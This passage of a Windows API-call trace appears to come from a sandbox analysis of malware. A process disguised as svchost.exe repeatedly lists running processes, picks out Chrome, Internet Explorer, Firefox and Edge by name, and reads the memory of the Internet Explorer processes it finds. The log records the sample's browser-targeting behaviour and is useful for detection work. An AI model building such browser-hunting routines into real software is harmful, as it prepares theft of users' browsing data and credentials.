	[0201.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.238] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.238] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0201.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.238] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.239] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0201.239] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1ef8
	[0201.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.239] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0201.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.240] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.240] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0201.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.241] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.241] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0201.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1efc
	[0201.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.242] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0201.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.242] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.243] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0201.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.243] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.244] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0201.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1f00
	[0201.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.245] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0201.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.245] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.245] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0201.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.245] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.246] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0201.246] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1f04
	[0201.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.246] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0201.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.247] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.247] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0201.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.248] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.248] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0201.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1f08
	[0201.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.249] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0201.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.249] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.250] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0201.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.250] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.250] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0201.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1f0c
	[0201.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.251] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0201.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.251] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.252] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0201.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.252] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.252] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0201.253] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1f10
	[0201.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.253] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0201.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.253] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.253] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0201.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.254] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.254] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0201.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1f14
	[0201.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.255] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0201.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.255] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.256] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0201.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.256] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.256] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0201.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1f18
	[0201.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.257] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0201.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.258] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.258] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0201.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.259] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.259] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0201.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1f1c
	[0201.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.260] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0201.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.261] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.261] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0201.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.261] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.262] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0201.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1f20
	[0201.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.263] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0201.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.263] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.264] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0201.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.264] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.265] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0201.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1f24
	[0201.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.266] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0201.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.266] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.267] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0201.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.267] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.267] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1f28
	[0201.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.268] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.268] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.269] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.269] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.269] NtQueryInformationProcess (in: ProcessHandle=0x1f28, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.269] ReadProcessMemory (in: hProcess=0x1f28, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.269] ReadProcessMemory (in: hProcess=0x1f28, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.269] ReadProcessMemory (in: hProcess=0x1f28, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.269] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.270] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1f2c
	[0201.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.270] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.271] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.271] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.271] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.271] NtQueryInformationProcess (in: ProcessHandle=0x1f2c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.271] ReadProcessMemory (in: hProcess=0x1f2c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.272] ReadProcessMemory (in: hProcess=0x1f2c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.272] ReadProcessMemory (in: hProcess=0x1f2c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.272] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.272] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1f30
	[0201.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.273] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.273] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.273] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.274] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0201.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1f34
	[0201.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.275] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0201.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.275] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.276] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0201.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.276] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.276] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1f38
	[0201.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.277] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.277] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.278] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.278] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.278] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.279] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0201.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1f3c
	[0201.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.280] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.280] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.280] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.281] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.281] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1f40
	[0201.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.281] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.282] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.282] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.282] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.283] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0201.283] CloseHandle (hObject=0x188) returned 1
	[0201.283] Sleep (dwMilliseconds=0x64) 
	[0201.382] GetCurrentProcessId () returned 0x110
	[0201.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0201.386] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0201.387] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0201.388] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0201.389] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1f44
	[0201.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.390] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.390] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.390] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.391] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.391] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1f48
	[0201.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.392] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.392] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.393] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.393] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
